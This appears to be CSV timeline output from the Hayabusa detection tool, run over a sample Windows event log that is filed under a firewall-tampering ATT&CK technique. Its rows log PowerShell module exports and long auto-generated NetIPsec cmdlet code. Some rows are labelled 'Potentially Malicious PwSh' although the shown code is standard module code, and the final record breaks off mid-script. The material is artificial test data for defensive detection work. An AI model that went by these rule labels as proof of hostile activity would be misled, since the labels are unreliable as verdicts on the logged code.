Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.277 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.280 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.281 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.282 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.285 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.286 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.286 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, 
[Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 
'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 